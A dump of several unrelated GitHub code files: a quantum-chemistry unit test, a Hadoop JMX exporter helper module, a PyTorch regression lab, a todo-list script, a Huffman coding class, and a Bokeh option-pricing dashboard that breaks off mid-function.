circuit2.gates = [gate_Y0, gate_Z1]\n\n target_circuits_list = [circuit1, circuit2]\n\n # Given\n qubit_op = QubitOperator(\"Z0 X1\") + QubitOperator(\"Y0 Z1\")\n\n # When\n pauli_circuits = create_circuits_from_qubit_operator(qubit_op)\n\n # Then\n self.assertEqual(pauli_circuits[0].gates, target_circuits_list[0].gates)\n self.assertEqual(pauli_circuits[1].gates, target_circuits_list[1].gates)\n self.assertEqual(\n str(pauli_circuits[0].qubits), str(target_circuits_list[0].qubits)\n )\n self.assertEqual(\n str(pauli_circuits[1].qubits), str(target_circuits_list[1].qubits)\n )\n\n\nclass TestOtherUtils(unittest.TestCase):\n def test_get_diagonal_component_polynomial_tensor(self):\n fermion_op = FermionOperator(\"0^ 1^ 2^ 0 1 2\", 1.0)\n fermion_op += FermionOperator(\"0^ 1^ 2^ 0 1 3\", 2.0)\n fermion_op += FermionOperator((), 3.0)\n polynomial_tensor = get_polynomial_tensor(fermion_op)\n diagonal_op, remainder_op = get_diagonal_component(polynomial_tensor)\n self.assertTrue((diagonal_op + remainder_op) == polynomial_tensor)\n diagonal_qubit_op = jordan_wigner(get_fermion_operator(diagonal_op))\n remainder_qubit_op = jordan_wigner(get_fermion_operator(remainder_op))\n for term in diagonal_qubit_op.terms:\n for pauli in term:\n self.assertTrue(pauli[1] == \"Z\")\n for term in remainder_qubit_op.terms:\n is_diagonal = True\n for pauli in term:\n if pauli[1] != \"Z\":\n is_diagonal = False\n break\n self.assertFalse(is_diagonal)\n\n def test_get_diagonal_component_interaction_op(self):\n fermion_op = FermionOperator(\"1^ 1\", 0.5)\n fermion_op += FermionOperator(\"2^ 2\", 0.5)\n fermion_op += FermionOperator(\"1^ 2^ 0 3\", 0.5)\n diagonal_op, remainder_op = get_diagonal_component(\n get_interaction_operator(fermion_op)\n )\n self.assertTrue(\n (diagonal_op + remainder_op) == get_interaction_operator(fermion_op)\n )\n diagonal_qubit_op = jordan_wigner(diagonal_op)\n remainder_qubit_op = jordan_wigner(remainder_op)\n for term in diagonal_qubit_op.terms:\n for pauli in term:\n self.assertTrue(pauli[1] == \"Z\")\n is_diagonal = True\n for term in remainder_qubit_op.terms:\n for pauli in term:\n if pauli[1] != \"Z\":\n is_diagonal = False\n break\n self.assertFalse(is_diagonal)\n\n def test_qubitop_to_paulisum_identity_operator(self):\n # Given\n qubit_operator = QubitOperator(\"\", 4)\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator)\n\n # Then\n self.assertEqual(paulisum.qubits, ())\n self.assertEqual(paulisum, PauliSum() + 4)\n\n def test_qubitop_to_paulisum_z0z1_operator(self):\n # Given\n qubit_operator = QubitOperator(\"Z0 Z1\", -1.5)\n expected_qubits = (GridQubit(0, 0), GridQubit(1, 0))\n expected_paulisum = (\n PauliSum()\n + PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * -1.5\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_qubitop_to_paulisum_setting_qubits(self):\n # Given\n qubit_operator = QubitOperator(\"Z0 Z1\", -1.5)\n expected_qubits = (LineQubit(0), LineQubit(5))\n expected_paulisum = (\n PauliSum()\n + PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * -1.5\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator, qubits=expected_qubits)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_qubitop_to_paulisum_more_terms(self):\n # Given\n qubit_operator = (\n QubitOperator(\"Z0 Z1 Z2\", 
-1.5)\n + QubitOperator(\"X0\", 2.5)\n + QubitOperator(\"Y1\", 3.5)\n )\n expected_qubits = (LineQubit(0), LineQubit(5), LineQubit(8))\n expected_paulisum = (\n PauliSum()\n + (\n PauliString(Z.on(expected_qubits[0]))\n * PauliString(Z.on(expected_qubits[1]))\n * PauliString(Z.on(expected_qubits[2]))\n * -1.5\n )\n + (PauliString(X.on(expected_qubits[0]) * 2.5))\n + (PauliString(Y.on(expected_qubits[1]) * 3.5))\n )\n\n # When\n paulisum = qubitop_to_paulisum(qubit_operator, qubits=expected_qubits)\n\n # Then\n self.assertEqual(paulisum.qubits, expected_qubits)\n self.assertEqual(paulisum, expected_paulisum)\n\n def test_get_ground_state_rdm_from_qubit_op(self):\n # Given\n n_sites = 2\n U = 5.0\n fhm = fermi_hubbard(\n x_dimension=n_sites,\n y_dimension=1,\n tunneling=1.0,\n coulomb=U,\n chemical_potential=U / 2,\n magnetic_field=0,\n periodic=False,\n spinless=False,\n particle_hole_symmetry=False,\n )\n fhm_qubit = jordan_wigner(fhm)\n fhm_int = get_interaction_operator(fhm)\n e, wf = jw_get_ground_state_at_particle_number(\n get_sparse_operator(fhm), n_sites\n )\n\n # When\n rdm = get_ground_state_rdm_from_qubit_op(\n qubit_operator=fhm_qubit, n_particles=n_sites\n )\n\n # Then\n self.assertAlmostEqual(e, rdm.expectation(fhm_int))\n\n def test_remove_inactive_orbitals(self):\n fermion_ham = load_interaction_operator(\n os.path.dirname(__file__) + \"/../testing/hamiltonian_HeH_plus_STO-3G.json\"\n )\n frozen_ham = remove_inactive_orbitals(fermion_ham, 1, 1)\n self.assertEqual(frozen_ham.one_body_tensor.shape[0], 2)\n\n hf_energy = hf_rdm(1, 1, 2).expectation(fermion_ham)\n self.assertAlmostEqual(frozen_ham.constant, hf_energy)\n","repo_name":"dlasecki/z-quantum-core","sub_path":"src/python/zquantum/core/openfermion/_utils_test.py","file_name":"_utils_test.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"27534688059","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport argparse\r\nimport logging\r\nimport yaml\r\n\r\n\r\ndef get_module_logger(mod_name):\r\n logger = logging.getLogger(mod_name)\r\n logger.setLevel(logging.DEBUG)\r\n\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n par_path = os.path.dirname(path)\r\n fh = logging.FileHandler(os.path.join(par_path, \"hadoop_jmx_exporter.log\"))\r\n fh.setLevel(logging.INFO)\r\n\r\n sh = logging.StreamHandler()\r\n sh.setLevel(logging.INFO)\r\n\r\n fmt = logging.Formatter(fmt='%(asctime)s %(filename)s[line:%(lineno)d]-[%(levelname)s]: %(message)s')\r\n fh.setFormatter(fmt)\r\n sh.setFormatter(fmt)\r\n\r\n logger.addHandler(fh)\r\n logger.addHandler(sh)\r\n return logger\r\n\r\n\r\nlogger = get_module_logger(__name__)\r\n\r\ndef read_json_file(path_name, file_name):\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n metric_path = os.path.join(path, \"metrics\", path_name)\r\n metric_name = \"{0}.json\".format(file_name)\r\n try:\r\n with open(os.path.join(metric_path, metric_name), 'r') as f:\r\n metrics = yaml.safe_load(f)\r\n return metrics\r\n except Exception as e:\r\n logger.info(\"read metrics json file failed, error msg is: %s\" % e)\r\n return {}\r\n\r\n\r\ndef get_file_list(file_path_name):\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n json_path = os.path.join(path, \"metrics\", file_path_name)\r\n try:\r\n files = os.listdir(json_path)\r\n except OSError:\r\n logger.info(\"No such file or directory: '%s'\" % json_path)\r\n return []\r\n else:\r\n rlt = []\r\n for i in 
range(len(files)):\r\n rlt.append(files[i].split(\".json\")[0])\r\n return rlt\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser(description='hadoop jmx metric prometheus exporter')\r\n parser.add_argument('-cluster', required=True, metavar='cluster_name', help='Hadoop cluster name (maybe HA name)')\r\n parser.add_argument('-queue', required=False, metavar='yarn_queue_regexp', help='Regular expression of queue name. default: root.*', default='root.*')\r\n parser.add_argument('-nns', required=False, metavar='namenode_jmx_url', help='Hadoop hdfs namenode jmx metrics URL.', nargs=\"*\")\r\n parser.add_argument('-rms', required=False, metavar='resourcemanager_jmx_url', help='Hadoop resourcemanager metrics jmx URL.', nargs=\"*\")\r\n parser.add_argument('-jns', required=False, metavar='journalnode_jmx_url', help='Hadoop journalnode jmx metrics URL.', nargs=\"*\")\r\n parser.add_argument('-host', required=False, metavar='host', help='Listen on this address. default: 0.0.0.0', default='0.0.0.0')\r\n parser.add_argument('-port', required=False, metavar='port', type=int, help='Listen to this port. default: 6688', default=6688)\r\n return parser.parse_args()\r\n","repo_name":"opsnull/hadoop_jmx_exporter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"27381204728","text":"# 17. Creating Dataset\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx = torch.randn(100, 1)*10\r\ny = x\r\nplt.plot(x.numpy(), y.numpy(), 'o')\r\n\r\nx = torch.randn(100, 1)*10\r\ny = x + torch.randn(100, 1)*3\r\nplt.plot(x.numpy(), y.numpy(), 'o')\r\nplt.ylabel('y')\r\nplt.xlabel('x')\r\n\r\nclass LR(nn.Module):\r\n def __init__(self, input_size, output_size):\r\n super().__init__()\r\n self.linear = nn.Linear(input_size, output_size)\r\n def forward(self, x):\r\n pred = self.linear(x)\r\n return pred\r\n\r\ntorch.manual_seed(1)\r\nmodel = LR(1,1)\r\nprint(model)\r\nx = torch.tensor([[1.0], [2.0]])\r\nprint(model.forward(x))\r\n\r\n[w, b] = model.parameters()\r\nprint(w, b)\r\nw1 = w[0][0]\r\nb1 = b[0]\r\nprint(w1, b1)\r\n\r\n[w, b] = model.parameters()\r\nw1 = w[0][0].item()\r\nb1 = b[0].item()\r\nprint(w1, b1)\r\n\r\n[w, b] = model.parameters()\r\ndef get_params():\r\n return (w[0][0].item(), b[0].item())\r\n","repo_name":"ghuijo/PyTorch","sub_path":"LabCodes/17_CreatingDataset_1.py","file_name":"17_CreatingDataset_1.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72354699687","text":"todos = list()\n\ndef create(task):\n todos.append(task)\n\ndef read(index):\n return todos[index]\n\ndef update(index, task):\n todos[index] = task\n\ndef destroy(index):\n todos.pop(index)\n\ndef list_all_tasks():\n index = 0\n for task in todos:\n print(\"{} {}\".format(index, task))\n index += 1\n\ndef mark_completed(index):\n task = todos[index]\n todos[index] = \"√\" + task\n\ndef select(function_code):\n\n if function_code == \"C\":\n input_task = user_input(\"Input task: \")\n create(input_task)\n elif function_code == \"R\":\n task_index = user_input(\"Index number? 
\")\n read(task_index)\n elif function_code == \"P\":\n list_all_tasks()\n elif function_code == \"Q\":\n return False\n else:\n print(\"Option unknown\")\n return True\n\ndef user_input(prompt):\n user_input = input(prompt)\n return user_input\n\ndef test():\n create(\"task one\")\n create(\"task two\")\n print(read(0))\n print(read(1))\n\n update(0, \"task three\")\n\n destroy(1)\n\n mark_completed(0)\n print(read(0))\n\n user_value = user_input(\"Please enter a value: \")\n print(user_value)\n\n select(\"C\")\n list_all_tasks()\n select(\"R\")\n\ntest()\n\nrunning = True\nwhile running:\n selection = user_input(\n \"Press C to add to list of tasks, R to read from list and P to display list...\"\n )\n running = select(selection)\n","repo_name":"diop/checklist","sub_path":"checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28550526097","text":"from HuffmanNode import HuffmanNode\nimport heapq\nfrom collections import Counter\n\n\nclass HuffmanTree(object):\n\t\n\tdef __init__(self, root=None):\n\n\t\tself.root = root\n\t\tself.heap = []\n\t\tself.CODES = {}\n\t\tself.enc_tree = bytearray()\n\n\n\n\tdef char_frequency(self, txt):\n\n\t\t'''\n\t\ttxt(str) -> char frequency (dict)\n\n\t\tThis Function calculates the number of times a character appears in Text\n\t\tand return min heap of char according to their frequency\n\n\t\t'''\n\n\t\tchar_freq = Counter(txt)\n\t\tself.heap = [HuffmanNode(char, freq) for char, freq in char_freq.items()]\n\t\theapq.heapify(self.heap)\n\n\t\treturn self.heap\n\n\n\n\tdef tree_build(self):\n\n\t\t'''\n\t\tBuild tree from Min heap, which is \n\t\tsorted due to character frequency in text\n\t\t'''\n\n\t\twhile (len(self.heap) > 1):\n\n\t\t\tnode1 = heapq.heappop(self.heap)\n\t\t\tnode2 = heapq.heappop(self.heap)\n\n\t\t\tfreq = int(node1.freq) + int(node2.freq)\n\n\t\t\theapq.heappush(self.heap, HuffmanNode(\"IN\", freq, node1, node2))\n\n\t\tself.root = heapq.heappop(self.heap)\n\n\n\n\tdef generate_codes(self, root , code = \"\"):\n\n\t\t'''\n\t\troot(HuffmanNode), code(str) -> UPDATE CODES(dict)\n\n\t\tCreate Huffman Code for each character Recursively\n\t\tBy traversing over the nodes starting from the Root\n\t\tadding \"0\" bit for each left step\n\t\tadding \"1\" bit fro each right step\n\t\t'''\n\n\t\tif root.left is None:\n\t\t\tif code == \"\":\n\t\t\t\tself.CODES[root.char] = 0 \n\t\t\t\treturn\n\t\t\tself.CODES[root.char] = code\n\t\t\treturn\n\n\t\tleft = root.left\n\t\tright = root.right\n\t\t\n\t\tself.generate_codes(left, code+\"0\")\n\t\tself.generate_codes(right, code+\"1\")\n\n\n\n\tdef encoded_tree(self, root=None):\n\n\t\tif root is None:\n\t\t\troot = self.root\n\n\n\t\tif root.left is None:\n\t\t\tself.enc_tree.append(ord(\"0\"))\n\t\t\tself.enc_tree.append(root.char)\n\n\t\telse:\n\n\t\t\tleft = root.left\n\t\t\tright = root.right\n\t\t\t\n\t\t\tself.enc_tree.append(ord(\"1\"))\n\t\t\tself.encoded_tree(left)\n\t\t\tself.encoded_tree(right)\n\n\t\treturn self.enc_tree\n\n\n\n\tdef huffman_coding(self, txt):\n\n\t\tself.char_frequency(txt)\n\t\tself.tree_build()\n\t\tself.generate_codes(self.root)\n\t\tself.encoded_tree()\n\n\t\treturn self.CODES, self.enc_tree\n\n","repo_name":"MMagdys/Huffman-Coding","sub_path":"HuffmanTree.py","file_name":"HuffmanTree.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
+{"seq_id":"13479349176","text":"# coding: utf-8\n\n# TO LAUNCH, RUN THIS IN A COMMAND PROMPT/TERMINAL\n# the first 2 lines depend on this file location on your computer (1st is useless if terminal is on the same partition)\n\n# D:/\n# cd Come/Documents/\"Master 203\"/\"Python for finance (PY)\"/Project \n# bokeh serve --show project.py \n\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport bokeh\nimport numpy as np\nimport scipy.stats as stats\nfrom arch import arch_model\n\nimport base64\nfrom io import BytesIO\n\nfrom bokeh.palettes import Spectral4\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import column, row\nfrom bokeh.models import ColumnDataSource, Slider, TextInput, Dropdown, CustomJS, Select, Spinner, Range1d, Toggle, \\\n Title, Panel, Tabs, RadioButtonGroup, Button, CheckboxGroup, CheckboxButtonGroup, DataTable, TableColumn, FileInput, Div, PreText\nfrom bokeh.plotting import figure\n\n\ndef BS_option_complete(nature, S, K, vol_annual, T, r_annual):\n r = r_annual/int(days_in_year_input.value)\n vol = vol_annual/np.sqrt(int(days_in_year_input.value))\n\n d_1 = (np.log(S/K) + (r + vol**2/2)*T)/(vol*np.sqrt(T))\n d_2 = d_1 - vol*np.sqrt(T)\n\n\t# Put and Call prices\n call_price = S*stats.norm.cdf(d_1) - K*np.exp(-r*T)*stats.norm.cdf(d_2)\n put_price = -S*stats.norm.cdf(-d_1) + K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n delta_call = stats.norm.cdf(d_1)\n delta_put = stats.norm.cdf(d_1)-1\n\n gamma_call = 1/(vol*S*np.sqrt(T))*stats.norm.pdf(d_1)\n gamma_put = gamma_call\n\n theta_call = -vol*S/(2*np.sqrt(T))*stats.norm.pdf(d_1) - r*K*np.exp(-r*T)*stats.norm.cdf(d_2)\n theta_put = -vol*S/(2*np.sqrt(T))*stats.norm.pdf(d_1) + r*K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n vega_call = S*np.sqrt(T)*stats.norm.pdf(d_1)\n vega_put = vega_call\n\n rho_call = T*K*np.exp(-r*T)*stats.norm.cdf(d_2)\n rho_put = -T*K*np.exp(-r*T)*stats.norm.cdf(-d_2)\n\n if(nature == 'call'):\n return (call_price, delta_call, gamma_call, theta_call, vega_call, rho_call)\n return (put_price, delta_put, gamma_put, theta_put, vega_put, rho_put)\n\n\ndef BS_call_complete(S, K, vol, T, r):\n return BS_option_complete('call', S, K, vol, T, r)\n\n\ndef BS_put_complete(S, K, vol, T, r):\n return BS_option_complete('put', S, K, vol, T, r)\n\nassets = {\n 'Call option': {'payoff': (lambda S, K: np.maximum(0, S-K)), 'BS_analytical': BS_call_complete},\n 'Put option': {'payoff': (lambda S, K: np.maximum(0, K-S)), 'BS_analytical': BS_put_complete},\n 'Spot': {'payoff': (lambda S, K: S), 'BS_analytical': (lambda S, K, vol, T, r: (S, 1, 0, 0, 0, 0))},\n }\n\n\ndef BS_path(theta, S0, T, N_points):\n r_annual, vol_annual = theta\n r = r_annual/int(days_in_year_input.value)\n vol = vol_annual/np.sqrt(int(days_in_year_input.value))\n\n res = S0*np.ones(N_points+1)\n res[1:] = S0*np.cumprod(np.exp((r - vol**2/2) * T/N_points + vol * np.random.standard_normal(size=(N_points)) * np.sqrt(T/N_points)))\n return res, vol*np.ones_like(res)\n\n\ndef heston_path(theta_incoming, S0, T, N_points):\n r_annual, v0_annual, kappa, theta_annual, sigma_annual, rho_annual = theta_incoming\n r = r_annual/int(days_in_year_input.value)\n v0 = v0_annual/int(days_in_year_input.value)\n theta = theta_annual/int(days_in_year_input.value)\n sigma = theta_annual/np.sqrt(int(days_in_year_input.value))\n rho = rho_annual/np.sqrt(int(days_in_year_input.value))\n\n res = S0*np.ones(N_points+1)\n vh = np.ones(N_points+1)\n vh[0] = v0\n\n z1 = np.random.standard_normal(size=(N_points))\n\n for t in range(1, N_points+1):\n vh[t] = 
max(vh[t-1] + kappa*(theta-vh[t-1]) * (T/N_points) + sigma*np.sqrt(vh[t-1]) * np.sqrt(T/N_points)*z1[t-1], 0)\n\n z2 = rho*z1 + np.sqrt(1-rho**2)*np.random.standard_normal(size=(N_points))\n\n for t in range(1, N_points+1):\n res[t] = res[t-1]*np.exp((r - sigma**2/2) * (T/N_points) + np.sqrt(vh[t]) * np.sqrt(T/N_points) * z2[t-1])\n\n return res, np.sqrt(vh)\n\n\ndef GARCH_path(theta, S0, T, N_points):\n (mu, omega, alpha, beta) = theta\n points_per_day = N_points/T\n pmu = mu/points_per_day\n pomega = omega/np.sqrt(points_per_day)\n\n nu = np.random.standard_normal(2*N_points)\n ret = np.zeros(2*N_points)\n sigma = np.zeros(2*N_points)\n for i in range(1, 2*N_points):\n sigma[i] = np.sqrt(pomega + alpha*ret[i-1]**2 + beta*sigma[i-1]**2)\n ret[i] = pmu + sigma[i]*nu[i]\n\n retret = np.zeros(N_points+1)\n retret[1:] = ret[N_points:]\n return S0*np.cumprod(np.exp(retret/100)), sigma[N_points-1:]/100\n\n\ndef GJR_GARCH_path(theta, S0, T, N_points):\n (mu, omega, alpha, beta, gamma) = theta\n points_per_day = N_points/T\n pmu = mu/points_per_day\n pomega = omega/np.sqrt(points_per_day)\n\n nu = np.random.standard_normal(2*N_points)\n ret = np.zeros(2*N_points)\n sigma = np.zeros(2*N_points)\n for i in range(1, 2*N_points):\n sigma[i] = np.sqrt(pomega + alpha*ret[i-1]**2 + beta*sigma[i-1]**2 + gamma*int(ret[i-1] < 0)*ret[i-1]**2)\n ret[i] = pmu + sigma[i]*nu[i]\n\n retret = np.zeros(N_points+1)\n retret[1:] = ret[N_points:]\n return S0*np.cumprod(np.exp(retret/100)), sigma[N_points-1:]/100\n\nmodels = {'Black-Scholes': {'params': [('annual risk-free IR r', -1, 1, 0.001, 0.024), ('annual volatility sigma', 0, 1, 0.001, 0.28)], 'path': BS_path},\n 'GARCH(1,1)': {'params': [('excess log-return bias mu', -1, 1, 0.001, 0.049), ('volatility bias omega', -1, 1, 0.001, 0.026), ('alpha', -1, 1, 0.001, 0.102), ('beta', -1, 1, 0.001, 0.886)], 'path': GARCH_path},\n 'GJR-GARCH(1,1)': {'params': [('excess log-return bias mu', -1, 1, 0.001, 0.002), ('volatility bias omega', -1, 1, 0.001, 0.027), ('alpha', -1, 1, 0.001, 0), ('beta', -1, 1, 0.001, 0.9), ('asymmetry factor gamma', -1, 1, 0.001, 0.169)], 'path': GJR_GARCH_path},\n 'Heston': {'params': [('annual risk-free IR r', -1, 1, 0.001, 0.024), ('v zero', 0, 1, 0.0001, 0.0276), ('kappa', 0, 5, 0.001, 1.200), ('theta', 0, 1, 0.001, 0.0660), ('sigma', 0, 1, 0.0001, 0.5928), ('rho', 0, 1, 0.0001, -0.6589)], 'path': heston_path},\n }\nmodel_names = list(models.keys())\nblocked_recompute = False\nrecompute_request = False\n\n# Set up data\nINITIAL_SPOT = 100\n\nS = np.linspace(0.8*INITIAL_SPOT, 1.2*INITIAL_SPOT, 1001)\ny = np.zeros_like(S)\nsource = ColumnDataSource(data=dict(x=S, curr=y, pnl_matu=y, pnl_int=y))\n\n# Set up plot\nplot = figure(plot_height=600, plot_width=750, title=\"Portfolio valuation\", align=\"start\", x_axis_label='Spot price', y_axis_label='Portfolio total value',\n tools=\"crosshair,pan,save,wheel_zoom\",\n x_range=[0.8*INITIAL_SPOT, 1.2*INITIAL_SPOT], y_range=[-INITIAL_SPOT, INITIAL_SPOT])\n\nplot.line('x', 'curr', source=source, line_width=4, line_alpha=0.8, muted_alpha=0.2, color=Spectral4[0], legend_label=\"Instantaneous value\")\nplot.line('x', 'pnl_int', source=source, line_width=3, line_alpha=1, muted_alpha=0.2, color=Spectral4[1], legend_label=\"Delayed value\")\nplot.line('x', 'pnl_matu', source=source, line_width=3, line_alpha=0.6, muted_alpha=0.2, color=Spectral4[3], legend_label=\"Payoff at maturity\")\n\nplot.title.align = 'center'\nplot.title.text_font_size = '20pt'\nplot.xaxis.axis_label_text_font_size = 
\"20pt\"\nplot.yaxis.axis_label_text_font_size = \"20pt\"\nplot.legend.location = \"top_left\"\nplot.legend.click_policy = \"mute\"\n\n\ncurr_spot_input = Slider(title=\"Current spot value\", value=INITIAL_SPOT, start=0, end=4*INITIAL_SPOT, step=0.1)\nint_delay_input = Spinner(title=\"Intermediary value delay\", value=1, low=0, high=5*365, step=1, width=140)\n\nleg_toggle_names = []\nqty_input = []\ntype_select = []\nstrike_input = []\nmaturity_input = []\nasset_type_list = list(assets.keys())\nfor leg_nb in range(4):\n leg_toggle_names.append(f\"Leg #{leg_nb}\")\n qty_input.append(Spinner(title=\"Total quantity\", low=-10**6, high=10**6, step=1, value=0, width=140, height=60))\n type_select.append(Select(title=\"Asset type:\", options=asset_type_list, value=asset_type_list[leg_nb % len(asset_type_list)], width=140, height=60))\n strike_input.append(Spinner(title=\"Strike\", low=0, high=1000, step=1, value=INITIAL_SPOT, width=140, height=60))\n maturity_input.append(Spinner(title=\"Time to maturity (days)\", low=0, high=5*365, step=1, value=50, width=140, height=60))\n\nleg_toggle = CheckboxButtonGroup(labels=leg_toggle_names, active=[0], sizing_mode=\"scale_width\")\n\nask_recompute = Button(label=\"Launch computation!\", button_type=\"success\", width=200)\nask_recompute.disabled = True\ninstant_recompute = CheckboxGroup(labels=[\"Automatically recompute\"], active=[0], width=180)\nrecompute_delay = Slider(title=\"Recompute delay (ms)\", value=500, start=0, end=1000, step=10, width=200)\n\ndisplay_data = dict(param=['Fair price at inception', 'Delta', 'Gamma', 'Theta', 'Vega', 'Rho'],\n th_value=[0 for i in range(6)],\n emp_value=[0 for i in range(6)])\ndisplay_source = ColumnDataSource(data=display_data)\n\ndisplay_columns = [\n TableColumn(field=\"param\", title=\"\"),\n TableColumn(field=\"th_value\", title=\"Theoritical value\"),\n TableColumn(field=\"emp_value\", title=\"Computed value\"),\n ]\ndisplay_data_table = DataTable(source=display_source, columns=display_columns, width=600, height=200)\n\n\ndef update_UI(attrname, old, new):\n redraw_UI()\n\n\ndef update_UI_mono(new):\n redraw_UI()\n\n\ndef redraw_UI():\n delay_red_flag = False\n T_delay = int_delay_input.value\n for leg_nb in range(4):\n if(leg_nb not in leg_toggle.active):\n qty_input[leg_nb].disabled = True\n type_select[leg_nb].disabled = True\n strike_input[leg_nb].disabled = True\n maturity_input[leg_nb].disabled = True\n else:\n qty_input[leg_nb].disabled = False\n type_select[leg_nb].disabled = False\n strike_input[leg_nb].disabled = False\n maturity_input[leg_nb].disabled = False\n asset_type = type_select[leg_nb].value\n if(asset_type in [\"Spot\"]):\n strike_input[leg_nb].visible = False\n maturity_input[leg_nb].visible = False\n else:\n strike_input[leg_nb].visible = True\n maturity_input[leg_nb].visible = True\n if(leg_nb in leg_toggle.active):\n T = maturity_input[leg_nb].value\n delay_red_flag += (T < T_delay)\n\n if(delay_red_flag):\n int_delay_input.background = 'red'\n else:\n int_delay_input.background = 'white'\n\n if(instant_recompute.active):\n ask_recompute.disabled = True\n recompute_delay.disabled = False\n else:\n ask_recompute.disabled = False\n recompute_delay.disabled = True\n\n\ndef recompute_asked(new):\n recompute()\n\n\ndef param_changed(attrname, old, new):\n global blocked_recompute\n global recompute_request\n if(instant_recompute.active and not blocked_recompute and not recompute_request):\n recompute_request = True\n curdoc().add_timeout_callback(recompute, 
def param_changed_mono(new):\n global blocked_recompute\n global recompute_request\n if(instant_recompute.active and not blocked_recompute and not recompute_request):\n recompute_request = True\n curdoc().add_timeout_callback(recompute, recompute_delay.value)\n\n\ndef Monte_Carlo(S0, T, N_Tries):\n res = np.zeros((N_Tries, T+1))\n for i in range(N_Tries):\n res[i, :] = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T, T)[0]\n return res\n\n\ndef Adaptive_Monte_Carlo(S0, T, err, N_max_tries):\n res = []\n tries = 0\n flag = True\n while((flag and tries < N_max_tries) or tries < 10):\n tries += 1\n simu_path = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T, T)[0]\n res.append(simu_path)\n flag = ((np.std(np.array(res)[:, -1])/S0) > err)\n return np.array(res)\n\n\ndef recompute():\n global blocked_recompute\n blocked_recompute = False\n\n global recompute_request\n recompute_request = False\n\n if(max([abs(qty_input[leg_nb].value) for leg_nb in range(4)]) <= 0):\n return\n\n # Generate the new curve\n S0 = curr_spot_input.value\n T_delay = int_delay_input.value\n S = np.concatenate([np.linspace(0, 0.8*S0, 20), np.linspace(0.8*S0, 1.2*S0, 51), np.linspace(1.2*S0, 2*S0, 20)])\n if(models[model_names[model_selection_input.active]]['resolution_method'].value == 'Analytical (recommended)'):\n S = np.linspace(0, 2*S0, 1001)\n close_index = np.argmin(abs(S-S0))\n maturity_value = np.zeros_like(S)\n current_value = np.zeros_like(S)\n int_value = np.zeros_like(S)\n\n th_greeks = np.zeros(6)\n emp_greeks = np.zeros(6)\n\n if(models[model_names[model_selection_input.active]]['resolution_method'].value == 'Analytical (recommended)'):\n r, vol = [x.value for x in models[model_names[0]]['params_inputs']]\n\n for leg_nb in range(4):\n Q = qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n T = maturity_input[leg_nb].value\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n\n T_int = max(T-T_delay, 0)\n unit_val = assets[asset_type][\"BS_analytical\"](S, K, vol, T, r)[0]\n unit_val_int = assets[asset_type][\"BS_analytical\"](S, K, vol, T_int, r)[0]\n th_greeks += Q*np.array(assets[asset_type][\"BS_analytical\"](S0, K, vol, T, r))\n\n if(T <= 0):\n unit_val = assets[asset_type][\"payoff\"](S, K)\n if(T_int <= 0):\n unit_val_int = assets[asset_type][\"payoff\"](S, K)\n\n current_value += Q*unit_val\n int_value += Q*unit_val_int\n maturity_value += Q*assets[asset_type][\"payoff\"](S, K)\n else:\n T_max = max([maturity_input[leg_nb].value for leg_nb in range(4)])\n monte_carlo_means = np.zeros_like(S)\n monte_carlo_std = np.zeros_like(S)\n monte_carlo_nb = np.zeros_like(S)\n\n for leg_nb in range(4):\n Q = qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n maturity_value += Q*assets[asset_type][\"payoff\"](S, K)\n\n for i, s_start in enumerate(S):\n if(not i % 10):\n print('Computing for s=', s_start)\n sim = np.zeros((1, 1))\n if((models[model_names[model_selection_input.active]]['resolution_method'].value == 'Monte-Carlo')):\n sim = Monte_Carlo(s_start, T_max, 1000*(1+2*int(abs(close_index-i) < 2)))\n else:\n sim = Adaptive_Monte_Carlo(s_start, T_max, 0.02, 1000*(1+2*int(abs(close_index-i) < 2)))\n\n for leg_nb in range(4):\n Q = 
